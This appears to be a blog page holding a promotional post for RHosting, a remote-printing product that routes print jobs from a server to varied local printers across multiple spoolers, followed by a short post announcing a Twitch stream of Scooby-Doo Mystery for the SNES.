In today's fast-paced business environment, the need for efficient and seamless printing solutions has never been greater. Enter RHosting, the pinnacle of printing solutions that revolutionizes the way users interact with local printers. With its state-of-the-art technology and unparalleled features, RHosting promises a printing experience like no other.
At the core of RHosting's appeal is its ability to seamlessly connect your server to a multitude of local printers, regardless of their make or model. Whether it's a Laserjet, Barcode, POS, or any other type, RHosting ensures that users can effortlessly send print commands to their desired printer, accommodating a wide range of paper sizes with ease.
What sets RHosting apart from its competitors is its unique approach to managing concurrent printing commands. While other products may struggle with a singular print spooler operation, RHosting excels in efficiently coordinating print commands across multiple spoolers. This forward-thinking approach eliminates the need for complex internal print queuing systems, resulting in improved speed and operational efficiency.
But perhaps the most significant distinction lies in RHosting's capacity to handle a variety of printers simultaneously, each with its own set of paper sizes. This capability ensures that remote users can print anything, anywhere, while still enjoying a seamless and local printing experience.
Gone are the days of sluggish printing processes and frustrating bottlenecks. With RHosting, multiple users can flawlessly print on diverse printer types simultaneously, leading to a smooth workflow, optimized productivity, and an unparalleled printing experience. Say goodbye to traditional systems and embrace the revolution in printing with RHosting, where efficiency meets convenience in a harmonious symphony of streamlined operations.
Experience the future of printing solutions with RHosting and unlock a world of possibilities for your business. Say hello to seamless printing and bid farewell to the frustrations of the past. Welcome to a new era of efficiency and convenience in printing. Welcome to RHosting.
0 notes
Photo
twitch.tv/multitapmugen LIVE with Scooby-Doo Mystery (SNES)
#scooby doo#scooby-doo#scooby doo mystery#scooby-doo mystery#shaggy#zoinks#jinkies#multitap#multitap classic console showcase#snes#super nintendo#super famicom#sfc#halloween#horror#ghost clown#rhost rown#vincent van ghoul#the perfect trap#fred#velma#daphne#scrappy doo#tappy doo
1 note